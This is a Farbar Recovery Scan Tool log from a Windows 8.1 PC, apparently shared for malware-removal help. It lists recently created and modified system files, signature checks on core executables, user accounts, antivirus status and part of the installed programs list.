2016-06-20 13:06 - 2015-05-03 15:55 - 00971776 _____ (Microsoft Corporation) C:\Windows\system32\WSShared.dll
2016-06-20 13:06 - 2015-05-03 15:49 - 00811008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSShared.dll
2016-06-20 13:06 - 2015-03-06 03:47 - 01696256 _____ (Microsoft Corporation) C:\Windows\system32\wevtsvc.dll
2016-06-20 13:05 - 2016-04-14 16:25 - 02778624 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-06-20 13:05 - 2016-04-14 16:11 - 02464768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-06-20 13:05 - 2016-02-05 20:07 - 00378712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2016-06-20 13:05 - 2016-02-05 16:11 - 00845312 _____ (Microsoft Corporation) C:\Windows\system32\BFE.DLL
2016-06-20 13:05 - 2016-02-05 16:11 - 00422400 _____ (Microsoft Corporation) C:\Windows\system32\FWPUCLNT.DLL
2016-06-20 13:05 - 2016-02-05 16:07 - 00272384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FWPUCLNT.DLL
2016-06-20 13:05 - 2016-02-05 16:02 - 01083904 _____ (Microsoft Corporation) C:\Windows\system32\IKEEXT.DLL
2016-06-20 13:05 - 2016-02-04 17:23 - 00713216 _____ (Microsoft Corporation) C:\Windows\system32\nshwfp.dll
2016-06-20 13:05 - 2016-02-04 17:22 - 00561664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nshwfp.dll
2016-06-20 13:05 - 2016-01-31 20:17 - 00118624 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2016-06-20 13:05 - 2016-01-31 19:07 - 00110080 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2016-06-20 13:05 - 2016-01-31 18:42 - 03320832 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2016-06-20 13:05 - 2016-01-31 18:14 - 03607040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2016-06-20 13:05 - 2015-10-08 17:11 - 00060928 _____ (Microsoft Corporation) C:\Windows\system32\PCPKsp.dll
2016-06-20 13:05 - 2015-10-08 16:50 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PCPKsp.dll
2016-06-20 13:05 - 2015-01-28 03:24 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\StorageContextHandler.dll
2016-06-20 13:05 - 2015-01-28 02:47 - 00060928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StorageContextHandler.dll
2016-06-20 13:04 - 2016-02-27 19:28 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2016-06-20 13:04 - 2016-02-27 18:57 - 03273728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll
2016-06-20 13:04 - 2016-02-27 18:19 - 03820544 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll
2016-06-20 13:04 - 2016-02-27 17:32 - 03547648 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2016-06-20 13:04 - 2015-10-11 07:34 - 00468824 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\USBHUB3.SYS
2016-06-20 13:04 - 2015-10-11 07:34 - 00462168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2016-06-20 13:04 - 2015-10-11 07:34 - 00443224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2016-06-20 13:04 - 2015-10-11 07:34 - 00027992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2016-06-20 13:04 - 2015-10-10 19:41 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2016-06-20 13:04 - 2015-10-10 19:41 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys
2016-06-20 13:04 - 2015-07-09 17:14 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2016-06-20 13:04 - 2015-04-13 23:37 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\authz.dll
2016-06-20 13:04 - 2015-04-13 23:34 - 00180224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authz.dll
2016-06-20 13:04 - 2015-04-10 01:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\UIAutomationCore.dll
2016-06-20 13:04 - 2015-04-10 01:17 - 01018880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAutomationCore.dll
2016-06-20 13:03 - 2016-03-16 02:58 - 00442712 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-06-20 13:03 - 2016-03-16 02:58 - 00332632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-06-20 13:03 - 2016-03-14 17:50 - 00316760 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\volsnap.sys
2016-06-20 13:03 - 2016-03-10 17:52 - 00186880 _____ (Microsoft Corporation) C:\Windows\system32\dpapisrv.dll
2016-06-20 13:03 - 2015-07-14 22:59 - 01113944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2016-06-20 13:03 - 2015-07-14 22:59 - 00487256 _____ (Microsoft Corporation) C:\Windows\system32\netcfgx.dll
2016-06-20 13:03 - 2015-07-14 22:59 - 00393560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netcfgx.dll
2016-06-20 13:03 - 2015-05-11 17:34 - 00332800 _____ (Microsoft Corporation) C:\Windows\system32\fhcpl.dll
2016-06-20 13:03 - 2015-04-16 07:17 - 00325464 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\USBXHCI.SYS
2016-06-20 13:03 - 2015-03-13 05:03 - 00239424 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2016-06-20 13:03 - 2015-03-13 05:03 - 00154432 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsd.sys
2016-06-20 13:03 - 2015-01-30 03:02 - 00102912 _____ (Microsoft Corporation) C:\Windows\system32\eappgnui.dll
2016-06-20 13:03 - 2015-01-30 02:40 - 00091648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eappgnui.dll
2016-06-20 13:03 - 2015-01-30 02:37 - 00331776 _____ (Microsoft Corporation) C:\Windows\system32\eapp3hst.dll
2016-06-20 13:03 - 2015-01-30 02:24 - 00339456 _____ (Microsoft Corporation) C:\Windows\system32\eapphost.dll
2016-06-20 13:03 - 2015-01-30 02:24 - 00250880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eapp3hst.dll
2016-06-20 13:03 - 2015-01-30 02:16 - 00266752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eapphost.dll
2016-06-20 13:03 - 2015-01-30 02:08 - 00346112 _____ (Microsoft Corporation) C:\Windows\system32\eappcfg.dll
2016-06-20 13:03 - 2015-01-30 02:06 - 00278016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eappcfg.dll
2016-06-20 13:02 - 2016-03-12 01:49 - 02466136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2016-06-20 13:02 - 2016-03-12 01:47 - 00160160 _____ (Microsoft Corporation) C:\Windows\system32\IPHLPAPI.DLL
2016-06-20 13:02 - 2016-03-12 01:47 - 00121912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IPHLPAPI.DLL
2016-06-20 13:02 - 2016-03-10 17:55 - 00510976 _____ (Microsoft Corporation) C:\Windows\system32\webio.dll
2016-06-20 13:02 - 2016-03-10 17:42 - 00413696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webio.dll
2016-06-20 13:02 - 2015-06-11 21:12 - 00428888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2016-06-20 13:02 - 2015-05-01 02:13 - 06521800 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
2016-06-20 13:02 - 2015-05-01 02:13 - 01488000 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll
2016-06-20 13:02 - 2015-05-01 02:13 - 00261376 _____ (Microsoft Corporation) C:\Windows\system32\sppwinob.dll
2016-06-20 13:02 - 2015-04-01 05:21 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2016-06-20 13:02 - 2015-04-01 05:18 - 00468480 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2016-06-20 13:02 - 2015-04-01 05:17 - 00248832 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2016-06-20 13:02 - 2015-04-01 05:08 - 00774144 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2016-06-20 13:02 - 2015-04-01 04:46 - 03633664 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2016-06-20 13:02 - 2015-04-01 04:17 - 02551808 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2016-06-20 13:02 - 2015-04-01 04:17 - 00903168 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2016-06-20 13:02 - 2015-04-01 03:53 - 00391680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2016-06-20 13:02 - 2015-04-01 03:53 - 00272896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2016-06-20 13:02 - 2015-04-01 03:45 - 02749952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2016-06-20 13:02 - 2015-04-01 03:45 - 00699392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2016-06-20 13:02 - 2015-04-01 03:14 - 01920000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2016-06-20 13:02 - 2015-04-01 03:12 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2016-06-20 13:02 - 2014-12-11 06:36 - 00046456 _____ (Microsoft Corporation) C:\Windows\system32\LockScreenContentServer.exe
2016-06-20 13:01 - 2015-12-20 15:56 - 00616960 _____ (Microsoft Corporation) C:\Windows\system32\msra.exe
2016-06-20 13:01 - 2015-10-05 19:28 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\wininit.exe
2016-06-20 13:01 - 2015-04-23 16:47 - 03084288 _____ (Microsoft Corporation) C:\Windows\system32\msftedit.dll
2016-06-20 13:01 - 2015-04-23 16:16 - 02471424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msftedit.dll
2016-06-20 13:01 - 2015-03-06 04:08 - 02067968 _____ (Microsoft Corporation) C:\Windows\system32\wpdshext.dll
2016-06-20 13:01 - 2015-03-06 03:43 - 01969664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpdshext.dll
2016-06-20 13:01 - 2015-02-08 00:57 - 01090048 _____ (Microsoft Corporation) C:\Windows\system32\MrmCoreR.dll
2016-06-20 13:01 - 2015-02-08 00:49 - 00791040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MrmCoreR.dll
2016-06-20 13:00 - 2016-01-05 16:00 - 00570880 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2016-06-20 13:00 - 2015-07-16 19:58 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\NcdAutoSetup.dll
2016-06-20 13:00 - 2015-07-10 20:06 - 00118272 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\bthpan.sys
2016-06-20 13:00 - 2015-06-09 23:39 - 00081920 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\BTHUSB.SYS
2016-06-20 13:00 - 2015-06-09 23:39 - 00053248 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\bthenum.sys
2016-06-20 13:00 - 2015-06-09 23:38 - 01201664 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\bthport.sys
2016-06-20 13:00 - 2015-05-12 14:19 - 00294912 _____ (Microsoft Corporation) C:\Windows\system32\SystemEventsBrokerServer.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-18 11:17 - 2016-06-15 15:44 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2876588207-1483049806-666444280-1002
2016-07-18 10:33 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\Inf
2016-07-17 19:38 - 2016-06-15 18:32 - 00000000 __SHD C:\Users\User not found\IntelGraphicsProfiles
2016-07-17 19:36 - 2013-08-22 15:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-07-16 13:36 - 2013-08-22 14:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-07-16 13:35 - 2013-08-22 16:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-07-16 13:35 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-07-16 13:34 - 2016-06-15 17:48 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-07-16 12:49 - 2016-06-15 18:34 - 00007750 _____ C:\Windows\system32\--traceoff
2016-07-16 12:47 - 2016-06-15 18:13 - 00000000 ____D C:\ProgramData\Adobe
2016-07-16 12:47 - 2016-06-15 15:39 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Adobe
2016-07-15 14:47 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\NDF
2016-07-13 22:59 - 2015-03-15 07:21 - 00826448 _____ C:\Windows\system32\prfh0816.dat
2016-07-13 22:59 - 2015-03-15 07:21 - 00180490 _____ C:\Windows\system32\prfc0816.dat
2016-07-13 22:59 - 2014-11-21 08:38 - 01921692 _____ C:\Windows\system32\PerfStringBackup.INI
2016-07-13 20:08 - 2013-08-22 16:36 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2016-07-13 19:30 - 2016-06-15 18:14 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Skype
2016-07-13 19:29 - 2016-06-15 18:14 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-07-13 19:29 - 2016-06-15 18:14 - 00000000 ____D C:\ProgramData\Skype
2016-07-12 19:20 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2016-07-12 19:20 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\Macromed
2016-07-11 18:20 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\rescache
2016-07-11 18:15 - 2016-06-15 16:46 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-07-11 18:15 - 2016-06-15 16:46 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-07-11 18:14 - 2016-06-15 16:48 - 00000000 ____D C:\ProgramData\NVIDIA
2016-07-11 18:14 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\Help
2016-07-08 14:45 - 2015-03-15 07:13 - 00000000 ____D C:\Windows\SysWOW64\XPSViewer
2016-07-08 14:45 - 2014-11-21 08:18 - 00000000 ____D C:\Program Files\Windows Journal
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\SysWOW64\winrm
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\SysWOW64\WCN
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\SysWOW64\slmgr
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\SysWOW64\Printing_Admin_Scripts
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\system32\winrm
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\system32\slmgr
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\WinStore
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\SysWOW64\MUI
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\SysWOW64\Com
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\migwiz
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\IME
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Windows Defender
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Common Files\System
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2016-07-08 14:45 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\SysWOW64\oobe
2016-07-08 14:45 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\SysWOW64\Dism
2016-07-08 14:45 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\system32\Sysprep
2016-07-08 14:45 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\system32\oobe
2016-07-08 14:44 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\system32\WCN
2016-07-08 14:44 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\system32\Printing_Admin_Scripts
2016-07-08 14:44 - 2013-08-22 16:36 - 00000000 ___SD C:\Windows\system32\dsc
2016-07-08 14:44 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\SystemResetPlatform
2016-07-08 14:44 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\MUI
2016-07-08 14:44 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\Com
2016-07-08 14:44 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\system32\Dism
2016-07-04 13:47 - 2013-08-22 16:20 - 00000000 ____D C:\Windows\CbsTemp
2016-07-04 12:29 - 2016-06-15 17:54 - 00000000 ____D C:\Program Files (x86)\Steam
2016-07-02 19:31 - 2016-06-15 15:39 - 00000000 ____D C:\Users\User not found
2016-07-02 15:52 - 2016-06-15 16:57 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-07-02 14:23 - 2014-12-30 18:48 - 00000000 ____D C:\Program Files (x86)\MSBuild
2016-06-27 17:22 - 2013-08-22 15:44 - 05096392 _____ C:\Windows\system32\FNTCACHE.DAT
2016-06-25 18:18 - 2016-06-15 18:05 - 00001760 _____ C:\Users\User not found\Desktop\MPC-HC x64.lnk
2016-06-23 19:34 - 2016-06-15 18:12 - 00000000 ____D C:\Users\User not found\AppData\Local\Adobe
2016-06-21 18:50 - 2016-06-15 18:32 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Sony
2016-06-21 14:46 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\AppCompat
2016-06-20 16:29 - 2016-06-15 16:54 - 00000000 __SHD C:\Users\User not found\AppData\Local\EmieUserList
2016-06-20 16:29 - 2016-06-15 16:54 - 00000000 __SHD C:\Users\User not found\AppData\Local\EmieSiteList
2016-06-20 16:28 - 2016-06-15 16:54 - 00000000 __SHD C:\Users\User not found\AppData\LocalLow\EmieUserList
2016-06-20 16:28 - 2016-06-15 16:53 - 00000000 __SHD C:\Users\User not found\AppData\LocalLow\EmieSiteList
2016-06-20 14:22 - 2014-11-21 16:14 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-06-20 14:22 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\system32\AdvancedInstallers
2016-06-20 14:21 - 2013-08-22 16:36 - 00000000 ___RD C:\Windows\ToastData

==================== Files in the root of some directories =======

2016-06-21 17:06 - 2016-07-02 21:13 - 0000132 _____ () C:\Users\User not found\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-07-13 19:56 - 2016-07-13 20:06 - 0047595 _____ () C:\Users\User not found\AppData\Roaming\ICARE.LOG

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-07-17 22:20

==================== End of FRST.txt ============================

 

 

 

 

 

 

 

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-07-2016 03
Ran by User not found (2016-07-18 13:51:07)
Running from C:\Users\User not found\Downloads
Windows 8.1 Pro (Update) (X64) (2016-06-15 14:39:02)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrador (S-1-5-21-2876588207-1483049806-666444280-500 - Administrator - Disabled)
Convidado (S-1-5-21-2876588207-1483049806-666444280-501 - Limited - Disabled)
User not found (S-1-5-21-2876588207-1483049806-666444280-1002 - Administrator - Enabled) => C:\Users\User not found

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Active Directory Authentication Library for SQL Server (Version: 13.0.1601.5 - Microsoft Corporation) Hidden
Active Directory Authentication Library for SQL Server (x86) (x32 Version: 13.0.1601.5 - Microsoft Corporation) Hidden
Actualizações da NVIDIA 2.11.4.0 (Version: 2.11.4.0 - NVIDIA Corporation) Hidden
Adobe Flash Player 22 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 22.0.0.209 - Adobe Systems Incorporated)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 12.1.2272 - AVAST Software)
Battlefield 3™ (HKLM-x32\...\{76285C16-411A-488A-BCE3-C83CB933D8CF}) (Version: 1.6.0.0 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.7.1 - EA Digital Illusions CE AB)
Counter-Strike: Global Offensive (HKLM\...\Steam App 730) (Version:  - Valve)
ESET Online Scanner v3 (HKLM-x32\...\ESET Online Scanner) (Version:  - )
IIS 10.0 Express (HKLM\...\{13FD7E30-D2F1-498D-ABC2-A4242DB6610E}) (Version: 10.0.1736 - Microsoft Corporation)
IIS Express Application Compatibility Database for x64 (HKLM\...\{08274920-8908-45c2-9258-8ad67ff77b09}.sdb) (Version:  - )
IIS Express Application Compatibility Database for x86 (HKLM\...\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb) (Version:  - )
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Kit de développement logiciel (SDK) Microsoft .NET Framework 4.6.1 (Français) (HKLM-x32\...\{9369E1F2-44C9-4864-843E-159725E660CB}) (Version: 4.6.01055 - Microsoft Corporation)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft .NET Framework 4.6.1 SDK (HKLM-x32\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM-x32\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM-x32\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (Français) (HKLM-x32\...\{AD054CB0-F527-48AD-832B-E65D46237C88}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.25420 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\OneDriveSetup.exe) (Version: 17.3.6390.0509 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20513.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Command Line Utilities  (HKLM\...\{9D573E71-1077-4C7E-B4DB-4E22A5D2B48B}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2014 Express LocalDB  (HKLM\...\{AB8DE9BA-19E1-446A-BCFA-6B3DA9751E21}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (HKLM-x32\...\{2774595F-BC2A-4B12-A25B-0C37A37049B0}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (x64) (HKLM\...\{1F9EB3B6-AED7-4AA7-B8F1-8E314B74B2A5}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom  (HKLM\...\{020CDFE0-C127-4047-B571-37C82396B662}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service  (HKLM-x32\...\{47D08E7A-92A1-489B-B0BF-415516497BCE}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2016 LocalDB  (HKLM\...\{E359515A-92E6-4FA3-A2C9-E1BA02D8DE6E}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects  (HKLM-x32\...\{0F1C8E2F-199A-4946-B3BF-0906DACFD032}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects  (x64) (HKLM\...\{20EA85AA-2A1D-4F11-B09F-4BA2BF3C8989}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL Language Service  (HKLM-x32\...\{8BFDE775-C5B8-46DB-84EF-43FFC8A2E8AD}) (Version: 13.0.14500.10 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL ScriptDom  (HKLM\...\{D091DE8C-EA0F-49AF-8DE3-BD6C79737C6E}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 x64 ENU (HKLM\...\{78909610-D229-459C-A936-25D92283D3FD}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server Data Tools - enu (14.0.60519.0) (HKLM-x32\...\{4E27B0EF-7BAB-432A-AF3D-3FC8F3F7353F}) (Version: 14.0.60519.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{68BA34E8-9B9D-4A74-83F0-7D366B532D75}) (Version: 12.0.2402.11 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{FC3BB979-AA54-4B60-BBA3-2C4DA6E08D80}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{091CE6AA-2753-4F6E-AD1C-0E875744EB54}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{718FFB65-F6E4-4D62-861F-ED10ED32C936}) (Version: 12.0.2402.11 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2016 (HKLM\...\{96EB5054-C775-4BEF-B7B9-AA96A295EDCD}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2016 (HKLM-x32\...\{84C23ECA-FE4D-494F-9247-3EBAD57E7F0C}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
